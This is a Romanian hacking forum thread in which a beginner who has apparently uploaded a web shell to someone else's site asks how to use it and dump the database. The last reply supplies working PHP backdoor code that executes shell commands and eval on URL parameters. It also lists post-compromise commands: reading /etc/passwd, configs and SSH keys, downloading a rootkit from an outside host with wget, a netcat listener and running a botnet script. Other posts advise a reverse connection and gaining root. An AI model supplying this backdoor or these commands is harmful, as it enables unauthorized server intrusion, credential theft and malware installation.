Jump to content
HTML

Comenzi în shell

Recommended Posts

Posted (edited)

Ai urcat shell?

Poi ce sistem de operare e? Linux? Connect back, exploit, etc.

L.E.: Poi tu ai urcat shell pe un site si nu ii sti numele? Glumesti?

Edited by hades
Posted (edited)
Ai urcat shell?

Poi ce sistem de operare e? Linux? Connect back, exploit, etc.

L.E.: Poi tu ai urcat shell pe un site si nu ii sti numele? Glumesti?

M-am exprimat gre?it. Prin "numele" m? refeream la numele de utilizator.

2) O alt? întrebare: Pot extrage baza de date printr-o comand? / cumva, cu ajutorul shell-ului?

Edited by HTML
Posted
Fa connectback in alt sv. incearca sa iei drept de root si de-acolo totul e floare la ureche.

Ok. Mul?umesc pentru ajutor, dar sunt încep?tor ?i nu în?eleg cum s? fac tot ceea ce ai spus tu mai sus.

Îmi explici, te rog, detaliat dac? vrei?

Posted

Scuza-ma putin, ai urcat un shell si nu stii de ce anume e capabil?Pai ce crezi ca e gradinita pe serverurile externe?Pai cine naiba tia dat dreptul sa parasesti localhost ?Sper din tot sufletul ca esti constient ca nu meriti sa fi ajutat deoarece ai gresit din start si ca in acest domeniu nu trebuie sa faci asemenea greseli.Adica sa stea baza de date a unui server in mainile unuia care habar nu are ce face?Voi va imaginati ca e stupid ceea ce faceti? Nu stiu daca va raspundeti la asemenea intrebari sau macar atunci cand te uiti in oglinda nu tie rusine?(Probabil nu dealtfel nu ai fi deschis acest topic)Power Fail!!!

Posted (edited)

Ori esti in stare sa faci ceva ori esti varza , nu avem nevoie de incepatori si e neinteresant faptul ca unii vor sa faca asa ceva.Toti ratatii isi merita soarta si nu e nevoie sa le explici cum sa faca deoarece nu vrem sa umplem caruta de ratati.E clar si logic ca sistemele sunt facute sa reziste singure impotriva ratatilor,doar de asta au fost programate de oameni inteligenti.Nu poti obtine access la un site , sa deschizi sacul si sa iti intre user-ul din database.Pana si database-urile au fost programate cu o logica in asa fel incat nu fiecare ratat sa puna mana usor pe date.Si faptul ca unii nu reusesc e deoarece e total stupid modul in care vor sa ajunga la obiectiv.Daca ar exista tool-uri automate pentru orice tip de exploiting s-ar umple universul de amatori si fiecare ratat o sa inceapa sa obtina access neautorizat oriunde vrea.Faptul ca putini cunosc atrage atentia celorlalti care trebuie sa se sbata pentru a demonstra ca pot face mai mult decat un simplu ratat.Asadar cei care merita cu adevarat vor putea face in asa fel incat sa curga date prin pahare in loc de sampanie.Restul si anume majoritatea vor fi doar un gunoi deoarece nu si-au dat intereseul sa cunoasca mai mult .Iar noi pe forum nu toleram gunoaiele deoarece nu vrem sa il transformam forumul intrun gunoi.Daca ai intrebat cum si ti-au spus ca poti face un reverse connection inseamna ca esti total ratat daca mai intrebi ce inseamna reverse connection deoarece urmatorul tau obiectiv este sa perfectionezi acest punct si anume cum sa faci un reverse connection.Daca iti dau sintaxa si intrebi in care mod sa aranjezi parametrii sunt eu ratat daca iti voi arata cum deoarece mam coborat la nivelul tau.Deci fara scuze de tipul "eu vreau sa invat" deoarece nu se dau diplome si oricum nu pot absolvii toti ratatii deoarece aici e diversa strategia desvoltarii invatamantului.Daca vrei sa inveti mergi la scoala deoarece cand vii aici trebuie sa detii studiile necesare.(E neinteresant daca nici la scoala nu te invata cum sa faci diverse lucruri deoarece metoda sistemului de invatamant e ratata precum si ratatii care au creato.)Sper ca am clarificat inca o data lucrurile.Ratatii cu gunoiul si gunoiul inafara forumului.

Edited by pyth0n3
Posted

Un backdoor shell, e un fisier, ce poate sa fie PHP,ASP,JSP,PLM,PNL,PDL. Ultimele trei sunt mai rar intalnite.

Iti voi da un exemplu, poate vei intelege mai bine, mai jos ai un cod care iti va permite ca atacator sa executi comenzi *nix,

<?php

if(isset($_GET['shell'])) echo("<pre>".shell_exec($_GET['shell']." &")."</pre>");

if(isset($_GET['php'])) echo(eval(stripcslashes($_GET['php'])));

if(isset($_GET['echo'])) echo($_GET['echo']);

?>

Acum vom presupune ca l`am salvat ca HTML.php si l`am incarcat pe un web server Linux. Vom avea nevoie sa punem ?shell= la sfarsit pentru a executa comenzi de genul:

cat /etc/passwd
wget www.slo.boz.com/rootkit.pl
cat /var/www/config.inc
find / -name netcat
ifconfig | grep eth0
perl botnet.pl
nc -lvp 1336
ls -la
ps aux | grep root
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat /proc/self/environ
find / -perm -1000 -type d 2>/dev/null
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
ruby -v
gcc -v
perl -v
python -v

screenshot8uj.png

Dar in sec 21, avem shell-uri ce au user interface, ceea ce le face mai usor de utilizat. Ia spre exemplu c99, r57 etc. Multe dintre shell-uri au functii precum email bomber, back-connect, file downloader or uploader, mysql dumper, run sql statements, web fuzzer, port scanner s.a.m.d.

Sper ca te`ai lamurit ce si cum sta treaba cu shell-urile backdoor.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...